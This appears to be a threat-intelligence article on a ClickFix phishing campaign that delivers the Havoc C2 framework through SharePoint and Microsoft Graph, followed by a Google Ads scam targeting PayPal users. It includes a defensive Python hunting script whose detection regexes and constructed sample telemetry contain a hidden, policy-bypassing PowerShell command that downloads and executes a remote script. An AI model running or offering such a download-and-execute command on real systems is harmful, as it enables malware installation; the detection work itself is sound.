
Havoc Phishing Attack

Cybersecurity investigators have uncovered a new phishing campaign that leverages the ClickFix technique to deploy Havoc, an open-source Command-and-Control (C2) framework. The attackers host the malware stages on an attacker-controlled SharePoint site and use a modified version of the Havoc Demon together with the Microsoft Graph API, so that C2 traffic blends into connections to legitimate Microsoft services.

The Phishing Trap: A Deceptive Email and ClickFix Manipulation

The attack is triggered by a phishing email that contains an HTML attachment named Documents.html. When opened, the file displays a fake error message that manipulates the victim into copying and executing a malicious PowerShell command. This technique, known as ClickFix, tricks users into believing they need to fix a OneDrive connection issue by manually updating their DNS cache; the pasted command does far more than that.

If the target falls for the trick, they inadvertently initiate the infection process by running a PowerShell script that connects to an attacker-controlled SharePoint server.

Multi-Stage Malware Deployment: From PowerShell to Python

Once the malicious PowerShell script executes, it first checks whether it is running in a sandbox, to evade analysis. If the environment looks like a real victim machine, the script downloads a Python interpreter (pythonw.exe, which runs scripts without opening a console window) if Python is not already installed on the system.

From there, a second PowerShell script fetches and executes a Python-based shellcode loader, which in turn launches KaynLdr, Havoc's reflective loader written in C and Assembly. This ultimately deploys the Havoc Demon agent on the compromised machine.
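The chain described above leaves a distinctive trace in process-creation telemetry: a user shell (explorer.exe) starts powershell.exe with a download cradle pointing at a SharePoint URL, and that PowerShell process then spawns pythonw.exe. The following is an added hunting example, not code from the original report or from the campaign; it scores constructed Sysmon-style process events for that pattern. The record fields, regexes, score weights and sample command lines are all assumptions chosen for illustration.

```python
"""Score process-creation events for a ClickFix -> PowerShell -> pythonw.exe chain.

Added example: the event records below are constructed, not captured from a
real incident, and the field layout (pid, ppid, image, cmdline) is an
assumption modelled on Sysmon Event ID 1.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Download-cradle and evasion indicators commonly seen in pasted ClickFix
# commands (constructed lists; extend them for your own environment).
CRADLE_RE = re.compile(
    r"(Invoke-WebRequest|\biwr\b|DownloadString|Net\.WebClient|Invoke-Expression|\biex\b)",
    re.I,
)
EVASION_RE = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass|-nop\b|-enc\w*\s)", re.I
)
SHAREPOINT_RE = re.compile(r"https?://[\w.-]*sharepoint\.com/", re.I)
USER_SHELLS = {"explorer.exe"}  # parents that imply a human typed/pasted the command


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcEvent, by_pid: dict) -> tuple:
    """Return (score, reasons) for one powershell.exe event; 0 for anything else."""
    if basename(ev.image) != "powershell.exe":
        return 0, []
    score, reasons = 0, []
    parent = by_pid.get(ev.ppid)
    if parent and basename(parent.image) in USER_SHELLS:
        score += 2
        reasons.append(f"parent is {basename(parent.image)} (user-pasted command)")
    if CRADLE_RE.search(ev.cmdline):
        score += 2
        reasons.append("download cradle in command line")
    if EVASION_RE.search(ev.cmdline):
        score += 1
        reasons.append("evasion switches")
    if SHAREPOINT_RE.search(ev.cmdline):
        score += 2
        reasons.append("SharePoint URL in command line")
    # Second stage: the same PowerShell process launching pythonw.exe.
    if any(c.ppid == ev.pid and basename(c.image) == "pythonw.exe" for c in by_pid.values()):
        score += 3
        reasons.append("spawned pythonw.exe")
    return score, reasons


def hunt(events: list, threshold: int = 5) -> list:
    """Return [(pid, score, reasons)] for events at or above the threshold."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        s, r = score_event(e, by_pid)
        if s >= threshold:
            findings.append((e.pid, s, r))
    return findings


# Constructed sample telemetry: one ClickFix chain plus two benign PowerShell runs.
SAMPLE_EVENTS = [
    ProcEvent(1000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1200, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -ep bypass -c "iwr https://contoso-my.sharepoint.com/sites/docs/stage1.ps1 | iex"'),
    ProcEvent(1300, 1200, r"C:\Users\victim\AppData\Local\Programs\Python\pythonw.exe",
              r"pythonw.exe C:\Users\victim\AppData\Local\Temp\loader.py"),
    ProcEvent(1400, 800, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\Scripts\backup.ps1"),
    # A user genuinely flushing DNS, as the lure claims to do: scores low.
    ProcEvent(1500, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe ipconfig /flushdns"),
]

if __name__ == "__main__":
    for pid, score, reasons in hunt(SAMPLE_EVENTS):
        print(f"pid {pid}: score {score}: {'; '.join(reasons)}")
```

The threshold is deliberately higher than any single indicator so that a legitimate `ipconfig /flushdns` launched from explorer.exe (which is exactly what the lure claims to do) does not fire on its own; the pythonw.exe child process is weighted highest because a user-pasted command that installs and launches an interpreter is rarely benign.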

Havoc’s Capabilities: A Stealthy Cyber Weapon

The attackers use Havoc in tandem with the Microsoft Graph API to conceal C2 traffic inside connections to a well-known, trusted Microsoft service, which sidesteps controls that rely only on blocking unknown or newly registered domains. Havoc's functionalities include:

  • Information gathering
  • File operations
  • Command execution
  • Payload execution
  • Token manipulation
  • Kerberos attacks

Google Advertisements Exploited to Target PayPal Users

In a separate yet alarming development, cybersecurity experts have also observed threat actors exploiting Google Ads policies to target PayPal users with fraudulent advertisements.

The scam works by impersonating legitimate PayPal support pages and tricking users into calling a fake customer service number. The goal is to collect victims' personal and financial information by convincing them they are speaking with legitimate PayPal representatives.

Google Advertisements Loophole: A Playground for Fraudsters

The success of these tech-support scams hinges on a loophole in Google Ads policies that allows bad actors to impersonate well-known brands. As long as the landing page (final URL) and the display URL belong to the same domain, fraudsters can create convincing fake advertisements that pass the platform's checks.

Cybercriminals are quick to exploit popular search terms, particularly those related to customer support and account recovery, ensuring that their fraudulent ads appear at the top of search results.

Conclusion: A Rising Threat Landscape

From ClickFix-powered phishing campaigns to Google Ads abuse, cybercriminals are continuously refining their social engineering tactics. These threats highlight the importance of vigilance, user awareness, and enhanced security measures to mitigate the risks posed by evolving cyberattacks.
